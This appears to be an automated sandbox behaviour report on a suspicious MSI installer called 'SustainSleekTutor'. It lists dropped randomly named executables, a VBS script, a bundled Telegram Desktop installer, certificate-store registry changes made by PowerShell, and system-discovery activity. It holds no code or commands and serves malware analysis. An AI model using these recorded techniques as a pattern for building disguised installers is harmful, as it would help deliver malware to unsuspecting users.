File opened (read-only) \??\Z: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\X: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UhHKDmESOIjj.exe.log C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\Saved Games C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File created C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\NLGACUfhExiQgpFqVoxutQoGyuzRSw C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\NLGACUfhExiQgpFqVoxutQoGyuzRSw C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe N/A
File created C:\Program Files\SustainSleekTutor\valibclang2d.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe N/A
File created C:\Program Files\SustainSleekTutor\tsetup.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\bFchqPntlegL C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{E94DD97D-74C5-4066-895C-1E7D5A0698F5} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB99B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57b807.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57b805.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57b805.msi C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\tsetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = … C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 6830eccbd53acba79b3678289e7adb3351caaff0c00b773c3d3ce8e0a6ee35f0 C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\NoModify = "1" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TelegramDesktop\Capabilities\ApplicationName = "Telegram Desktop" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TelegramDesktop\Capabilities\UrlAssociations\tg = "tdesktop.tg" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TelegramDesktop C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\tg\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1 C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayVersion = "5.2.3" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\InstallLocation = "C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\NoRepair = "1" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TelegramDesktop\Capabilities C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\WScript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\HelpLink = "https://desktop.telegram.org" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\MinorVersion = "2" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: Setup Version = "6.2.2" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tdesktop.tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = 61d04e6bf84ec24f19c1f205f15fd6c7cc1e20c01e3bba5e1632aff982bcdb60 C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: Icon Group = "Telegram Desktop" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: No Icons = "1" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayName = "Telegram Desktop" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D79DD49E5C47660498C5E1D7A560895F\ProductFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\PackageName = "92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D716B2B7A13A72439FD62E0DFA6E582 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\ProductName = "SustainSleekTutor" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\PackageCode = "422D740D8F2748241AF491420E7509A6" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Version = "100794368" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D716B2B7A13A72439FD62E0DFA6E582\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
